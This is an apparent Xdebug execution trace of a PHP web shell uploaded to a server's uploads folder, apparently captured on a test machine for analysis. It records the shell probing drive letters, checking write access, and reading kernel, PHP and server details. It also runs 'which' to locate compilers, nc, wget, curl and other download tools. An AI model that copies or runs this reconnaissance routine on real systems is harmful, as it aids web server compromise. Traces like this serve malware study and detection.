4 55 0 0.005397 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'j:'
4 55 1 0.005411 1008968
4 55 R FALSE
4 56 0 0.005424 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'k:'
4 56 1 0.005438 1008968
4 56 R FALSE
4 57 0 0.005451 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'l:'
4 57 1 0.005464 1008968
4 57 R FALSE
4 58 0 0.005477 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'm:'
4 58 1 0.005491 1008968
4 58 R FALSE
4 59 0 0.005504 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'n:'
4 59 1 0.005518 1008968
4 59 R FALSE
4 60 0 0.005530 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'o:'
4 60 1 0.005544 1008968
4 60 R FALSE
4 61 0 0.005557 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'p:'
4 61 1 0.005571 1008968
4 61 R FALSE
4 62 0 0.005584 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'q:'
4 62 1 0.005598 1008968
4 62 R FALSE
4 63 0 0.005610 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'r:'
4 63 1 0.005624 1008968
4 63 R FALSE
4 64 0 0.005636 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 's:'
4 64 1 0.005651 1008968
4 64 R FALSE
4 65 0 0.005663 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 't:'
4 65 1 0.005677 1008968
4 65 R FALSE
4 66 0 0.005690 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'u:'
4 66 1 0.005704 1008968
4 66 R FALSE
4 67 0 0.005717 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'v:'
4 67 1 0.005734 1008968
4 67 R FALSE
4 68 0 0.005747 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'w:'
4 68 1 0.005761 1008968
4 68 R FALSE
4 69 0 0.005774 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'x:'
4 69 1 0.005787 1008968
4 69 R FALSE
4 70 0 0.005800 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'y:'
4 70 1 0.005813 1008968
4 70 R FALSE
4 71 0 0.005826 1008928 is_dir 0 /var/www/html/uploads/flowers1.php 103 1 'z:'
4 71 1 0.005840 1008968
4 71 R FALSE
4 72 0 0.005854 1007560 is_writable 0 /var/www/html/uploads/flowers1.php 474 1 '/var/www/html/uploads/'
4 72 1 0.005873 1007600
4 72 R TRUE
4 73 0 0.005892 1007672 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 535 1 '/var/www/html/uploads/'
4 73 1 0.005907 1007864
4 73 R '/var/www/html/uploads/'
4 74 0 0.005922 1007832 base64_encode 0 /var/www/html/uploads/flowers1.php 535 1 '/var/www/html/uploads/'
4 74 1 0.005936 1007928
4 74 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzLw=='
4 75 0 0.005952 1007784 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 538 1 'FilesMan'
4 75 1 0.005966 1007976
4 75 R 'FilesMan'
4 76 0 0.005980 1007800 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 539 1 'Windows-1251'
4 76 1 0.005994 1007992
4 76 R 'Windows-1251'
4 77 0 0.006010 1007832 strpos 0 /var/www/html/uploads/flowers1.php 542 2 NULL '\r\n'
4 77 1 0.006024 1007904
4 77 R FALSE
4 78 0 0.006038 1007832 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 543 2 NULL 3
4 78 1 0.006051 1008064
4 78 R ''
4 79 0 0.006065 1007864 strpos 0 /var/www/html/uploads/flowers1.php 546 2 NULL '\r\n'
4 79 1 0.006079 1007936
4 79 R FALSE
4 80 0 0.006093 1007864 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 547 2 NULL 3
4 80 1 0.006107 1008096
4 80 R ''
4 81 0 0.006120 1007896 strpos 0 /var/www/html/uploads/flowers1.php 550 2 NULL '\r\n'
4 81 1 0.006134 1007968
4 81 R FALSE
4 82 0 0.006147 1007896 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 551 2 NULL 3
4 82 1 0.006160 1008128
4 82 R ''
4 83 0 0.006174 1007672 php_uname 0 /var/www/html/uploads/flowers1.php 654 0
4 83 1 0.006187 1007784
4 83 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4 84 0 0.006206 1007784 substr 0 /var/www/html/uploads/flowers1.php 654 3 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 0 120
4 84 1 0.006224 1007880
4 84 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4 85 0 0.006243 1009208 phpversion 0 /var/www/html/uploads/flowers1.php 662 0
4 85 1 0.006255 1009272
4 85 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
4 86 0 0.006273 1007672 file 0 /var/www/html/uploads/flowers1.php 671 1 '/etc/named.conf'
4 86 1 0.006297 1007824
4 86 R FALSE
3 A /var/www/html/uploads/flowers1.php 671 $d0mains = FALSE
4 87 0 0.006324 1007784 yemenSize 1 /var/www/html/uploads/flowers1.php 684 1 232015802368
5 88 0 0.006338 1007784 sprintf 0 /var/www/html/uploads/flowers1.php 1277 2 '%1.2f' 216.08155441284
5 88 1 0.006353 1008168
5 88 R '216.08'
4 87 1 0.006367 1007824
4 87 R '216.08 GB'
4 89 0 0.006382 1007912 yemenSize 1 /var/www/html/uploads/flowers1.php 684 1 202862895104
5 90 0 0.006395 1007912 sprintf 0 /var/www/html/uploads/flowers1.php 1277 2 '%1.2f' 188.93079376221
5 90 1 0.006410 1008296
5 90 R '188.93'
4 89 1 0.006424 1007952
4 89 R '188.93 GB'
4 91 0 0.006439 1007784 ini_get 0 /var/www/html/uploads/flowers1.php 686 1 'safe_mode'
4 91 1 0.006452 1007816
4 91 R FALSE
3 A /var/www/html/uploads/flowers1.php 687 $userful = [0 => 'gcc', 1 => 'lcc', 2 => 'cc', 3 => 'ld', 4 => 'make', 5 => 'php', 6 => 'perl', 7 => 'python', 8 => 'ruby', 9 => 'tar', 10 => 'gzip', 11 => 'bzip', 12 => 'bzip2', 13 => 'nc', 14 => 'locate', 15 => 'suidperl']
4 92 0 0.006490 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'gcc'
5 93 0 0.006504 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which gcc'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 94 0 0.006531 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 94 1 0.006544 1007864
6 94 R TRUE
6 95 0 0.006558 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which gcc' ''
6 95 1 0.007916 1008368
6 95 R '/usr/bin/gcc'
6 96 0 0.007943 1008264 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' [0 => '/usr/bin/gcc']
6 96 1 0.007961 1008328
6 96 R '/usr/bin/gcc'
5 A /var/www/html/uploads/flowers1.php 27 $out = '/usr/bin/gcc'
5 93 1 0.007989 1007864
5 93 R '/usr/bin/gcc'
4 A /var/www/html/uploads/flowers1.php 1274 $path = '/usr/bin/gcc'
4 92 1 0.008016 1007824
4 92 R '/usr/bin/gcc'
4 97 0 0.008031 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'lcc'
5 98 0 0.008045 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which lcc'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 99 0 0.008069 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 99 1 0.008083 1007864
6 99 R TRUE
6 100 0 0.008096 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which lcc' ''
6 100 1 0.009098 1007968
6 100 R ''
6 101 0 0.009122 1007904 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' []
6 101 1 0.009138 1007968
6 101 R ''
5 A /var/www/html/uploads/flowers1.php 27 $out = ''
5 98 1 0.009164 1007824
5 98 R ''
4 A /var/www/html/uploads/flowers1.php 1274 $path = ''
4 97 1 0.009189 1007784
4 97 R FALSE
4 102 0 0.009203 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'cc'
5 103 0 0.009217 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which cc'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 104 0 0.009241 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 104 1 0.009254 1007864
6 104 R TRUE
6 105 0 0.009268 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which cc' ''
6 105 1 0.010282 1008368
6 105 R '/usr/bin/cc'
6 106 0 0.010306 1008264 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' [0 => '/usr/bin/cc']
6 106 1 0.010323 1008328
6 106 R '/usr/bin/cc'
5 A /var/www/html/uploads/flowers1.php 27 $out = '/usr/bin/cc'
5 103 1 0.010351 1007864
5 103 R '/usr/bin/cc'
4 A /var/www/html/uploads/flowers1.php 1274 $path = '/usr/bin/cc'
4 102 1 0.010378 1007824
4 102 R '/usr/bin/cc'
4 107 0 0.010393 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'ld'
5 108 0 0.010407 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which ld'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 109 0 0.010431 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 109 1 0.010445 1007864
6 109 R TRUE
6 110 0 0.010459 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which ld' ''
6 110 1 0.011881 1008368
6 110 R '/usr/bin/ld'
6 111 0 0.011923 1008264 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' [0 => '/usr/bin/ld']
6 111 1 0.011943 1008328
6 111 R '/usr/bin/ld'
5 A /var/www/html/uploads/flowers1.php 27 $out = '/usr/bin/ld'
5 108 1 0.011972 1007864
5 108 R '/usr/bin/ld'
4 A /var/www/html/uploads/flowers1.php 1274 $path = '/usr/bin/ld'
4 107 1 0.011999 1007824
4 107 R '/usr/bin/ld'
4 112 0 0.012016 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'make'
5 113 0 0.012030 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which make'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 114 0 0.012055 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 114 1 0.012069 1007864
6 114 R TRUE
6 115 0 0.012083 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which make' ''
6 115 1 0.013681 1008368
6 115 R '/usr/bin/make'
6 116 0 0.013734 1008264 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' [0 => '/usr/bin/make']
6 116 1 0.013754 1008328
6 116 R '/usr/bin/make'
5 A /var/www/html/uploads/flowers1.php 27 $out = '/usr/bin/make'
5 113 1 0.013784 1007864
5 113 R '/usr/bin/make'
4 A /var/www/html/uploads/flowers1.php 1274 $path = '/usr/bin/make'
4 112 1 0.013811 1007824
4 112 R '/usr/bin/make'
4 117 0 0.013828 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'php'
5 118 0 0.013843 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which php'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 119 0 0.013868 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 119 1 0.013882 1007864
6 119 R TRUE
6 120 0 0.013896 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which php' ''
6 120 1 0.015283 1008368
6 120 R '/usr/bin/php'
6 121 0 0.015316 1008264 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' [0 => '/usr/bin/php']
6 121 1 0.015335 1008328
6 121 R '/usr/bin/php'
5 A /var/www/html/uploads/flowers1.php 27 $out = '/usr/bin/php'
5 118 1 0.015362 1007864
5 118 R '/usr/bin/php'
4 A /var/www/html/uploads/flowers1.php 1274 $path = '/usr/bin/php'
4 117 1 0.015389 1007824
4 117 R '/usr/bin/php'
4 122 0 0.015404 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'perl'
5 123 0 0.015419 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which perl'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 124 0 0.015443 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 124 1 0.015457 1007864
6 124 R TRUE
6 125 0 0.015470 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which perl' ''
6 125 1 0.016710 1008368
6 125 R '/usr/bin/perl'
6 126 0 0.016737 1008264 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' [0 => '/usr/bin/perl']
6 126 1 0.016754 1008328
6 126 R '/usr/bin/perl'
5 A /var/www/html/uploads/flowers1.php 27 $out = '/usr/bin/perl'
5 123 1 0.016782 1007864
5 123 R '/usr/bin/perl'
4 A /var/www/html/uploads/flowers1.php 1274 $path = '/usr/bin/perl'
4 122 1 0.016808 1007824
4 122 R '/usr/bin/perl'
4 127 0 0.016823 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'python'
5 128 0 0.016837 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which python'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 129 0 0.016862 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 129 1 0.016876 1007864
6 129 R TRUE
6 130 0 0.016889 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which python' ''
6 130 1 0.018125 1007968
6 130 R ''
6 131 0 0.018149 1007904 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' []
6 131 1 0.018165 1007968
6 131 R ''
5 A /var/www/html/uploads/flowers1.php 27 $out = ''
5 128 1 0.018191 1007824
5 128 R ''
4 A /var/www/html/uploads/flowers1.php 1274 $path = ''
4 127 1 0.018216 1007784
4 127 R FALSE
4 132 0 0.018230 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'ruby'
5 133 0 0.018244 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which ruby'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 134 0 0.018268 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 134 1 0.018282 1007864
6 134 R TRUE
6 135 0 0.018295 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which ruby' ''
6 135 1 0.019568 1007968
6 135 R ''
6 136 0 0.019592 1007904 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' []
6 136 1 0.019608 1007968
6 136 R ''
5 A /var/www/html/uploads/flowers1.php 27 $out = ''
5 133 1 0.019634 1007824
5 133 R ''
4 A /var/www/html/uploads/flowers1.php 1274 $path = ''
4 132 1 0.019665 1007784
4 132 R FALSE
4 137 0 0.019680 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'tar'
5 138 0 0.019694 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which tar'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 139 0 0.019718 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 139 1 0.019738 1007864
6 139 R TRUE
6 140 0 0.019752 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which tar' ''
6 140 1 0.020824 1008368
6 140 R '/usr/bin/tar'
6 141 0 0.020849 1008264 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' [0 => '/usr/bin/tar']
6 141 1 0.020866 1008328
6 141 R '/usr/bin/tar'
5 A /var/www/html/uploads/flowers1.php 27 $out = '/usr/bin/tar'
5 138 1 0.020893 1007864
5 138 R '/usr/bin/tar'
4 A /var/www/html/uploads/flowers1.php 1274 $path = '/usr/bin/tar'
4 137 1 0.020919 1007824
4 137 R '/usr/bin/tar'
4 142 0 0.020935 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'gzip'
5 143 0 0.020949 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which gzip'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 144 0 0.020974 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 144 1 0.020987 1007864
6 144 R TRUE
6 145 0 0.021001 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which gzip' ''
6 145 1 0.022008 1008368
6 145 R '/usr/bin/gzip'
6 146 0 0.022033 1008264 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' [0 => '/usr/bin/gzip']
6 146 1 0.022050 1008328
6 146 R '/usr/bin/gzip'
5 A /var/www/html/uploads/flowers1.php 27 $out = '/usr/bin/gzip'
5 143 1 0.022077 1007864
5 143 R '/usr/bin/gzip'
4 A /var/www/html/uploads/flowers1.php 1274 $path = '/usr/bin/gzip'
4 142 1 0.022104 1007824
4 142 R '/usr/bin/gzip'
4 147 0 0.022119 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'bzip'
5 148 0 0.022133 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which bzip'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 149 0 0.022157 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 149 1 0.022171 1007864
6 149 R TRUE
6 150 0 0.022185 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which bzip' ''
6 150 1 0.023343 1007968
6 150 R ''
6 151 0 0.023372 1007904 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' []
6 151 1 0.023388 1007968
6 151 R ''
5 A /var/www/html/uploads/flowers1.php 27 $out = ''
5 148 1 0.023415 1007824
5 148 R ''
4 A /var/www/html/uploads/flowers1.php 1274 $path = ''
4 147 1 0.023440 1007784
4 147 R FALSE
4 152 0 0.023454 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'bzip2'
5 153 0 0.023469 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which bzip2'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 154 0 0.023493 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 154 1 0.023508 1007864
6 154 R TRUE
6 155 0 0.023521 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which bzip2' ''
6 155 1 0.024864 1008368
6 155 R '/usr/bin/bzip2'
6 156 0 0.024935 1008264 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' [0 => '/usr/bin/bzip2']
6 156 1 0.024967 1008328
6 156 R '/usr/bin/bzip2'
5 A /var/www/html/uploads/flowers1.php 27 $out = '/usr/bin/bzip2'
5 153 1 0.025024 1007864
5 153 R '/usr/bin/bzip2'
4 A /var/www/html/uploads/flowers1.php 1274 $path = '/usr/bin/bzip2'
4 152 1 0.025074 1007824
4 152 R '/usr/bin/bzip2'
4 157 0 0.025109 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'nc'
5 158 0 0.025134 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which nc'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 159 0 0.025197 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 159 1 0.025224 1007864
6 159 R TRUE
6 160 0 0.025252 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which nc' ''
6 160 1 0.026593 1008368
6 160 R '/usr/bin/nc'
6 161 0 0.026628 1008264 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' [0 => '/usr/bin/nc']
6 161 1 0.026646 1008328
6 161 R '/usr/bin/nc'
5 A /var/www/html/uploads/flowers1.php 27 $out = '/usr/bin/nc'
5 158 1 0.026675 1007864
5 158 R '/usr/bin/nc'
4 A /var/www/html/uploads/flowers1.php 1274 $path = '/usr/bin/nc'
4 157 1 0.026702 1007824
4 157 R '/usr/bin/nc'
4 162 0 0.026718 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'locate'
5 163 0 0.026733 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which locate'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 164 0 0.026757 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 164 1 0.026771 1007864
6 164 R TRUE
6 165 0 0.026785 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which locate' ''
6 165 1 0.028062 1007968
6 165 R ''
6 166 0 0.028088 1007904 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' []
6 166 1 0.028103 1007968
6 166 R ''
5 A /var/www/html/uploads/flowers1.php 27 $out = ''
5 163 1 0.028129 1007824
5 163 R ''
4 A /var/www/html/uploads/flowers1.php 1274 $path = ''
4 162 1 0.028154 1007784
4 162 R FALSE
4 167 0 0.028169 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 688 1 'suidperl'
5 168 0 0.028183 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which suidperl'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 169 0 0.028207 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 169 1 0.028222 1007864
6 169 R TRUE
6 170 0 0.028235 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which suidperl' ''
6 170 1 0.029438 1007968
6 170 R ''
6 171 0 0.029460 1007904 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' []
6 171 1 0.029475 1007968
6 171 R ''
5 A /var/www/html/uploads/flowers1.php 27 $out = ''
5 168 1 0.029500 1007824
5 168 R ''
4 A /var/www/html/uploads/flowers1.php 1274 $path = ''
4 167 1 0.029525 1007784
4 167 R FALSE
3 A /var/www/html/uploads/flowers1.php 693 $downloaders = [0 => 'wget', 1 => 'fetch', 2 => 'lynx', 3 => 'links', 4 => 'curl', 5 => 'get', 6 => 'lwp-mirror']
4 172 0 0.029560 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 694 1 'wget'
5 173 0 0.029574 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which wget'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 174 0 0.029598 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 174 1 0.029611 1007864
6 174 R TRUE
6 175 0 0.029625 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which wget' ''
6 175 1 0.030853 1008368
6 175 R '/usr/bin/wget'
6 176 0 0.030878 1008264 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' [0 => '/usr/bin/wget']
6 176 1 0.030895 1008328
6 176 R '/usr/bin/wget'
5 A /var/www/html/uploads/flowers1.php 27 $out = '/usr/bin/wget'
5 173 1 0.030923 1007864
5 173 R '/usr/bin/wget'
4 A /var/www/html/uploads/flowers1.php 1274 $path = '/usr/bin/wget'
4 172 1 0.030950 1007824
4 172 R '/usr/bin/wget'
4 177 0 0.030965 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 694 1 'fetch'
5 178 0 0.030979 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which fetch'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 179 0 0.031003 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 179 1 0.031017 1007864
6 179 R TRUE
6 180 0 0.031030 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which fetch' ''
6 180 1 0.032259 1007968
6 180 R ''
6 181 0 0.032283 1007904 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' []
6 181 1 0.032298 1007968
6 181 R ''
5 A /var/www/html/uploads/flowers1.php 27 $out = ''
5 178 1 0.032324 1007824
5 178 R ''
4 A /var/www/html/uploads/flowers1.php 1274 $path = ''
4 177 1 0.032348 1007784
4 177 R FALSE
4 182 0 0.032362 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 694 1 'lynx'
5 183 0 0.032376 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which lynx'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 184 0 0.032400 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 184 1 0.032413 1007864
6 184 R TRUE
6 185 0 0.032427 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which lynx' ''
6 185 1 0.033439 1007968
6 185 R ''
6 186 0 0.033462 1007904 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' []
6 186 1 0.033478 1007968
6 186 R ''
5 A /var/www/html/uploads/flowers1.php 27 $out = ''
5 183 1 0.033503 1007824
5 183 R ''
4 A /var/www/html/uploads/flowers1.php 1274 $path = ''
4 182 1 0.033528 1007784
4 182 R FALSE
4 187 0 0.033542 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 694 1 'links'
5 188 0 0.033556 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which links'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 189 0 0.033580 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 189 1 0.033594 1007864
6 189 R TRUE
6 190 0 0.033607 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which links' ''
6 190 1 0.034602 1007968
6 190 R ''
6 191 0 0.034625 1007904 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' []
6 191 1 0.034640 1007968
6 191 R ''
5 A /var/www/html/uploads/flowers1.php 27 $out = ''
5 188 1 0.034666 1007824
5 188 R ''
4 A /var/www/html/uploads/flowers1.php 1274 $path = ''
4 187 1 0.034690 1007784
4 187 R FALSE
4 192 0 0.034704 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 694 1 'curl'
5 193 0 0.034718 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which curl'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 194 0 0.034742 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 194 1 0.034755 1007864
6 194 R TRUE
6 195 0 0.034768 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which curl' ''
6 195 1 0.035963 1008368
6 195 R '/usr/bin/curl'
6 196 0 0.036002 1008264 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' [0 => '/usr/bin/curl']
6 196 1 0.036020 1008328
6 196 R '/usr/bin/curl'
5 A /var/www/html/uploads/flowers1.php 27 $out = '/usr/bin/curl'
5 193 1 0.036049 1007864
5 193 R '/usr/bin/curl'
4 A /var/www/html/uploads/flowers1.php 1274 $path = '/usr/bin/curl'
4 192 1 0.036077 1007824
4 192 R '/usr/bin/curl'
4 197 0 0.036095 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 694 1 'get'
5 198 0 0.036110 1007824 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which get'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 199 0 0.036134 1007824 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 199 1 0.036149 1007864
6 199 R TRUE
6 200 0 0.036163 1007848 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which get' ''
6 200 1 0.037630 1007968
6 200 R ''
6 201 0 0.037698 1007904 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' []
6 201 1 0.037728 1007968
6 201 R ''
5 A /var/www/html/uploads/flowers1.php 27 $out = ''
5 198 1 0.037781 1007824
5 198 R ''
4 A /var/www/html/uploads/flowers1.php 1274 $path = ''
4 197 1 0.037830 1007784
4 197 R FALSE
4 202 0 0.037860 1007784 yemenWhich 1 /var/www/html/uploads/flowers1.php 694 1 'lwp-mirror'
5 203 0 0.037901 1007832 yemenEx 1 /var/www/html/uploads/flowers1.php 1274 1 'which lwp-mirror'
5 A /var/www/html/uploads/flowers1.php 24 $out = ''
6 204 0 0.037946 1007832 function_exists 0 /var/www/html/uploads/flowers1.php 25 1 'exec'
6 204 1 0.037971 1007872
6 204 R TRUE
6 205 0 0.038001 1007856 exec 0 /var/www/html/uploads/flowers1.php 25 2 'which lwp-mirror' ''
6 205 1 0.039545 1008392
6 205 R '/usr/bin/lwp-mirror'
6 206 0 0.039576 1008280 join 0 /var/www/html/uploads/flowers1.php 27 2 '\r\n' [0 => '/usr/bin/lwp-mirror']
6 206 1 0.039594 1008344
6 206 R '/usr/bin/lwp-mirror'
5 A /var/www/html/uploads/flowers1.php 27 $out = '/usr/bin/lwp-mirror'
5 203 1 0.039623 1007880
5 203 R '/usr/bin/lwp-mirror'
4 A /var/www/html/uploads/flowers1.php 1274 $path = '/usr/bin/lwp-mirror'
4 202 1 0.039650 1007832
4 202 R '/usr/bin/lwp-mirror'
4 207 0 0.039673 1009064 getenv 0 /var/www/html/uploads/flowers1.php 714 1 'SERVER_SOFTWARE'
4 207 1 0.039692 1009144
4 207 R 'Apache/2.4.52 (Ubuntu)'
